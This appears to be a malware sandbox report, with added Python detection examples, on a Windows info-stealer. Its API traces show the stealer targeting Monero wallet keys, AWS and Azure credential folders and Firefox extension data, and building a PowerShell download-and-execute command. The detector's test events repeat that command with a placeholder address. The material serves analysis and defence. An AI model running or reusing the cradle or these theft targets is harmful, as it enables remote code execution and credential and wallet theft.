                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: 9eea5a97f57a6a548242e9725850454882c4c78b4dc5244c6207cf0a522170a5
                          • Instruction ID: 477bbd49976170a03575e1458d5823d7dbf06470ffc1fc375c7d15ab8f89ce9c
                          • Opcode Fuzzy Hash: 9eea5a97f57a6a548242e9725850454882c4c78b4dc5244c6207cf0a522170a5
                          • Instruction Fuzzy Hash: C802C371A1161A9BDB21EF78E889AEF7FB5BF45300F144129F905A7290EB34DC85CB90
                          APIs
                            • Part of subcall function 00511120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00511135
                            • Part of subcall function 00511120: RtlAllocateHeap.NTDLL(00000000), ref: 0051113C
                            • Part of subcall function 00511120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00511159
                            • Part of subcall function 00511120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00511173
                            • Part of subcall function 00511120: RegCloseKey.ADVAPI32(?), ref: 0051117D
                          • lstrcat.KERNEL32(?,00000000), ref: 005111C0
                          • lstrlen.KERNEL32(?), ref: 005111CD
                          • lstrcat.KERNEL32(?,.keys), ref: 005111E8
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051121F
                          • lstrlen.KERNEL32(011A8A20), ref: 0051122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511251
                          • lstrcat.KERNEL32(00000000,011A8A20), ref: 00511259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00511264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00511294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005112BA
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005112FF
                          • lstrlen.KERNEL32(011ACF20), ref: 0051130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511335
                          • lstrcat.KERNEL32(00000000,?), ref: 0051133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00511378
                          • lstrcat.KERNEL32(00000000), ref: 00511385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005113AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 005113D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051143D
                            • Part of subcall function 0052EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0052EE12
                          • DeleteFileA.KERNEL32(?), ref: 00511471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: ee8779f3921bed15e1c99d61e3bf1bfbddee559fa1eb9fd03f4a3baf8a670ae9
                          • Instruction ID: f220d7c05abc5fd7fcf2e3a079ba23286251507deb56f9243fbd3caeaa783a31
                          • Opcode Fuzzy Hash: ee8779f3921bed15e1c99d61e3bf1bfbddee559fa1eb9fd03f4a3baf8a670ae9
                          • Instruction Fuzzy Hash: B4A1A075A0060A9BEB21EBB4DC89ADE7FB9BF85700F044464FA05E7251DB34DDC18B98
                          APIs
                          • memset.MSVCRT ref: 0052E740
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0052E769
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E79F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E7AD
                          • lstrcat.KERNEL32(?,\.azure\), ref: 0052E7C6
                          • memset.MSVCRT ref: 0052E805
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0052E82D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E85F
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E86D
                          • lstrcat.KERNEL32(?,\.aws\), ref: 0052E886
                          • memset.MSVCRT ref: 0052E8C5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0052E8F1
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052E920
                          • lstrcat.KERNEL32(?,00000000), ref: 0052E92E
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 0052E947
                          • memset.MSVCRT ref: 0052E986
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$memset$FolderPathlstrcpy
                          • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 4067350539-3645552435
                          • Opcode ID: 0e9e13dc5edad4060f6699ed25bbdbe64d318b24b244d5ff71fd02623b90f9e3
                          • Instruction ID: bd6fd7035aa010ebb1a2dc4f025fcf034e03e144c949f07375a3edb9ef8d9dd1
                          • Opcode Fuzzy Hash: 0e9e13dc5edad4060f6699ed25bbdbe64d318b24b244d5ff71fd02623b90f9e3
                          • Instruction Fuzzy Hash: FC71E971A90229ABEB21EB64DC4AFED7B74BF49700F004494B719AB1C1DBB49AC48F54
                          APIs
                          • lstrcpy.KERNEL32 ref: 0052ABCF
                          • lstrlen.KERNEL32(011AD9F0), ref: 0052ABE5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AC0D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052AC18
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AC41
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AC84
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052AC8E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ACB7
                          • lstrlen.KERNEL32(00544AD4), ref: 0052ACD1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ACF3
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 0052ACFF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AD28
                          • lstrlen.KERNEL32(00544AD4), ref: 0052AD3A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AD5C
                          • lstrcat.KERNEL32(00000000,00544AD4), ref: 0052AD68
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AD91
                          • lstrlen.KERNEL32(011ADBB8), ref: 0052ADA7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052ADCF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052ADDA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AE03
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052AE3F
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052AE49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052AE6F
                          • lstrlen.KERNEL32(00000000), ref: 0052AE85
                          • lstrcpy.KERNEL32(00000000,011ADB70), ref: 0052AEB8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen
                          • String ID: f
                          • API String ID: 2762123234-1993550816
                          • Opcode ID: 8a952aaddb101272309ede3a645568a8fdf013aeb3a919953322607b09d972de
                          • Instruction ID: c253ba006a7b1974e6506a421f63115238024ed6e9048fcd86a5d244026e618c
                          • Opcode Fuzzy Hash: 8a952aaddb101272309ede3a645568a8fdf013aeb3a919953322607b09d972de
                          • Instruction Fuzzy Hash: 2AB181309115279BDB22EB78EC4DAAFBBBABF82700F044425B80197291DB74DD91CB91
                          APIs
                          • LoadLibraryA.KERNEL32(ws2_32.dll,?,005272A4), ref: 005347E6
                          • GetProcAddress.KERNEL32(00000000,connect), ref: 005347FC
                          • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 0053480D
                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 0053481E
                          • GetProcAddress.KERNEL32(00000000,htons), ref: 0053482F
                          • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 00534840
                          • GetProcAddress.KERNEL32(00000000,recv), ref: 00534851
                          • GetProcAddress.KERNEL32(00000000,socket), ref: 00534862
                          • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 00534873
                          • GetProcAddress.KERNEL32(00000000,closesocket), ref: 00534884
                          • GetProcAddress.KERNEL32(00000000,send), ref: 00534895
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                          • API String ID: 2238633743-3087812094
                          • Opcode ID: 71e50aebdc9ca4cc52202d739b4a8badff4ae6f0373d9c1161778aa50233eac7
                          • Instruction ID: b0fd3ce7277c3f3b7c3eb333f09740743cd367f6355460f40751d40461235bee
                          • Opcode Fuzzy Hash: 71e50aebdc9ca4cc52202d739b4a8badff4ae6f0373d9c1161778aa50233eac7
                          • Instruction Fuzzy Hash: AF11EF79951735EBC7509FB4AC0EA9A3EB8BA0B709304981BF291D2171FBFD4400DB59
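The function above is the sample's hand-rolled import resolver: it loads ws2_32.dll with LoadLibraryA and fetches the ten Winsock exports it needs through GetProcAddress, so the PE import directory never mentions networking. As an added example that is not part of the Joe Sandbox report or of the sample, the triage check below looks for the resulting tell in a static scan: the DLL name plus a cluster of its export names in the string table, in a file whose import table does not list that DLL. The DYNAMIC_API_SETS table and both binary blobs are constructed assumptions, and the import lists stand in for what a PE parser would report.

```python
"""Static triage check for Winsock APIs resolved at run time.

Added example, not code from the Joe Sandbox report or from the sample. The
function above never imports ws2_32.dll through the PE import table: it calls
LoadLibraryA("ws2_32.dll") and then GetProcAddress() once per export, so the
import directory says nothing about networking while the export names sit in
the string table next to the DLL name. This scanner reproduces `strings -n 4`
and looks for that cluster in a file whose import table does NOT list the DLL.
DYNAMIC_API_SETS is an assumed table, and both blobs are constructed stand-ins
for files on disk.
"""
import re
from typing import Dict, Iterable, List

# Assumed: the exports a stealer resolves by hand when it wants a raw TCP channel.
DYNAMIC_API_SETS: Dict[str, List[str]] = {
    "ws2_32.dll": ["WSAStartup", "WSACleanup", "socket", "connect", "send",
                   "recv", "closesocket", "getaddrinfo", "freeaddrinfo", "htons"],
}
# The two kernel32 primitives every hand-rolled resolver still has to import.
RESOLVER_PRIMITIVES = {"LoadLibraryA", "GetProcAddress"}

_ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob: bytes) -> List[str]:
    """Printable ASCII runs of at least four bytes, like `strings -n 4`."""
    return [m.group().decode("ascii") for m in _ASCII_RUN.finditer(blob)]


def find_dynamic_resolution(blob: bytes, imported_dlls: Iterable[str],
                            min_hits: int = 4) -> Dict[str, List[str]]:
    """Return {dll: [export names found]} for each DLL in DYNAMIC_API_SETS that
    the binary names as a string together with at least `min_hits` of its
    exports, but does not list in its import table. `imported_dlls` comes from
    a PE parser (with pefile: entry.dll for entry in pe.DIRECTORY_ENTRY_IMPORT).
    Nothing is reported unless LoadLibraryA and GetProcAddress are present,
    because without them the names cannot become call targets this way."""
    strings = set(extract_strings(blob))
    if not RESOLVER_PRIMITIVES <= strings:
        return {}
    lowered = {s.lower() for s in strings}
    statically_linked = {d.lower() for d in imported_dlls}
    findings: Dict[str, List[str]] = {}
    for dll, exports in DYNAMIC_API_SETS.items():
        if dll.lower() not in lowered or dll.lower() in statically_linked:
            continue
        # GetProcAddress is case-sensitive, so compare export names exactly.
        hits = [name for name in exports if name in strings]
        if len(hits) >= min_hits:
            findings[dll] = hits
    return findings


def _c_strings(*names: str) -> bytes:
    """Lay names out as NUL-terminated C strings, the way they sit in a binary."""
    return b"".join(n.encode("ascii") + b"\x00" for n in names)


# Constructed blob mirroring the string layout of the function above: kernel32
# import names, some code bytes, then the Winsock names fed to GetProcAddress.
SAMPLE_BLOB = (b"MZ\x90\x00" + b"\x00" * 64
               + _c_strings("KERNEL32.dll", "LoadLibraryA", "GetProcAddress", "lstrcpyA")
               + b"\xcc" * 32
               + _c_strings("ws2_32.dll", "connect", "WSAStartup", "getaddrinfo", "htons",
                            "WSACleanup", "recv", "socket", "freeaddrinfo", "closesocket", "send"))
# Import table of the sample as a parser would report it (constructed): no ws2_32.
SAMPLE_IMPORTS = {"KERNEL32.dll", "SHELL32.dll", "WININET.dll"}

# Constructed blob of a program that links Winsock normally: the same names
# appear, but the import table accounts for them.
BENIGN_BLOB = (b"MZ\x90\x00" + b"\x00" * 64
               + _c_strings("KERNEL32.dll", "LoadLibraryA", "GetProcAddress", "ExitProcess")
               + _c_strings("WS2_32.dll", "socket", "connect", "send", "recv", "closesocket"))
BENIGN_IMPORTS = {"KERNEL32.dll", "WS2_32.dll"}


if __name__ == "__main__":
    print("sample:", find_dynamic_resolution(SAMPLE_BLOB, SAMPLE_IMPORTS))
    print("benign:", find_dynamic_resolution(BENIGN_BLOB, BENIGN_IMPORTS))
```

The string cluster alone is only a hint, since almost every CRT-linked program imports LoadLibraryA and GetProcAddress; the import-table comparison is what turns it into a finding. Packed samples need to be scanned after unpacking, as this one was (the dump above is the 00510000 image after the section rights changed).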
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052BE53
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0052BE86
                          • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0052BE91
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052BEB1
                          • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 0052BEBD
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BEE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052BEEB
                          • lstrlen.KERNEL32(')"), ref: 0052BEF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BF13
                          • lstrcat.KERNEL32(00000000,')"), ref: 0052BF1F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BF46
                          • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0052BF66
                          • lstrcpy.KERNEL32(00000000,?), ref: 0052BF88
                          • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 0052BF94
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052BFBA
                          • ShellExecuteEx.SHELL32(?), ref: 0052C00C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          • API String ID: 4016326548-898575020
                          • Opcode ID: 6eae7a4aedfb1527bdf06a969b02499e4cb77351633e10ba37b28edfb3c440ad
                          • Instruction ID: b53ed801f287d84fa0d8faddecd05558089438b7aa2450b3a8d0d0eb74edaf28
                          • Opcode Fuzzy Hash: 6eae7a4aedfb1527bdf06a969b02499e4cb77351633e10ba37b28edfb3c440ad
                          • Instruction Fuzzy Hash: D861D431A1022A9BEB21AFB5AC8DAEF7FB9BF46300F004425F505E7251DB34C9918F91
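The function above concatenates a command line of the form `powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('<url>')"` and hands it to ShellExecuteEx; the SysWOW64 path is what a 32-bit process gets when it asks for PowerShell on a 64-bit host. The report does not show the URL in this function. As an added example, not part of the Joe Sandbox report, the detection below runs over process-creation events shaped like Sysmon Event ID 1 / Security 4688 fields. The events are constructed, and 203.0.113.10 is a documentation address standing in for whatever the sample actually downloads from.

```python
"""Detection logic for the PowerShell download cradle assembled by the function
above. Added example, not part of the Joe Sandbox report; the process-creation
events are constructed and 203.0.113.10 is a placeholder, since the report does
not reveal the download URL in this function."""
import re
from typing import Dict, List, Optional

# iex(New-Object Net.WebClient).DownloadString('<url>') in any casing, with or
# without the System. prefix, either quote style, and quotes that were escaped
# for cmd.exe (\"...\").
CRADLE = re.compile(
    r"""iex\s*\(\s*new-object\s+(?:system\.)?net\.webclient\s*\)\s*\.\s*downloadstring"""
    r"""\s*\(\s*\\?(['"])([^'"\\]+)\\?\1\s*\)""",
    re.IGNORECASE,
)
# PowerShell accepts any unambiguous prefix of -NoProfile, so -nop ... -noprofile.
NO_PROFILE = re.compile(r"(?:^|\s)-nop(?:r(?:o(?:f(?:i(?:l(?:e)?)?)?)?)?)?(?=\s|$)", re.IGNORECASE)

SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # the launch this function performs: 32-bit parent, hence the WOW64 PowerShell
        "ParentImage": "C:\\Users\\user\\Desktop\\file.exe",
        "Image": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -nop -c "
                       "\"iex(New-Object Net.WebClient).DownloadString('http://203.0.113.10/u.ps1')\"",
    },
    {   # an admin script: -NoProfile on its own is not suspicious
        "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
    },
    {   # the same cradle with different casing, the System. prefix and escaped double quotes
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": 'powershell -NoProfile -Command "IEX (New-Object System.Net.WebClient)'
                       '.DownloadString(\\"http://203.0.113.10/x\\")"',
    },
]


def detect_cradle(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a download-and-execute cradle in one event, or None."""
    cmd = event["CommandLine"]
    m = CRADLE.search(cmd)
    if not m:
        return None
    return {
        "url": m.group(2),
        "parent": event["ParentImage"],
        "no_profile": bool(NO_PROFILE.search(cmd)),
        # The WOW64 PowerShell only appears when a 32-bit process launched it;
        # on a 64-bit host that is worth a second look on its own.
        "wow64": "\\syswow64\\" in event["Image"].lower(),
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the detector over a batch of events and keep the hits."""
    return [f for f in (detect_cradle(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The regex is deliberately tolerant about whitespace, casing and the `System.` prefix because PowerShell is; it does not try to undo string concatenation or encoded commands, which is what the AMSI/ScriptBlock logging channel (Event ID 4104) is for. Pair it with the parent image: a cradle launched from a user-profile executable, as here, is a stronger signal than the same text typed at a console.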
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0053184F
                          • lstrlen.KERNEL32(01196188), ref: 00531860
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531887
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531892
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005318C1
                          • lstrlen.KERNEL32(00544FA0), ref: 005318D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005318F4
                          • lstrcat.KERNEL32(00000000,00544FA0), ref: 00531900
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053192F
                          • lstrlen.KERNEL32(01196028), ref: 00531945
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0053196C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531977
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005319A6
                          • lstrlen.KERNEL32(00544FA0), ref: 005319B8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005319D9
                          • lstrcat.KERNEL32(00000000,00544FA0), ref: 005319E5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531A14
                          • lstrlen.KERNEL32(01196038), ref: 00531A2A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531A51
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531A5C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531A8B
                          • lstrlen.KERNEL32(01196078), ref: 00531AA1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531AC8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00531AD3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00531B02
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen
                          • String ID:
                          • API String ID: 1049500425-0
                          • Opcode ID: ba024e8220f9b0aa2b64a1ac417f01a51da3012f17fa54d3baa4a98d7bbaae7f
                          • Instruction ID: 60064d6ac0d430abed7ff0bf60015ac023929ac325fdc97011409979cdbeb569
                          • Opcode Fuzzy Hash: ba024e8220f9b0aa2b64a1ac417f01a51da3012f17fa54d3baa4a98d7bbaae7f
                          • Instruction Fuzzy Hash: CC9151B5601B079FE7209FB9DC88A5BBBE9FF45301F148829B986C3251DB78D881CB54
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524793
                          • LocalAlloc.KERNEL32(00000040,?), ref: 005247C5
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524812
                          • lstrlen.KERNEL32(00544B60), ref: 0052481D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052483A
                          • lstrcat.KERNEL32(00000000,00544B60), ref: 00524846
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052486B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524898
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005248A3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005248CA
                          • StrStrA.SHLWAPI(?,00000000), ref: 005248DC
                          • lstrlen.KERNEL32(?), ref: 005248F0
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00524931
                          • lstrcpy.KERNEL32(00000000,?), ref: 005249B8
                          • lstrcpy.KERNEL32(00000000,?), ref: 005249E1
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524A0A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524A30
                          • lstrcpy.KERNEL32(00000000,?), ref: 00524A5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$AllocLocal
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 4107348322-3310892237
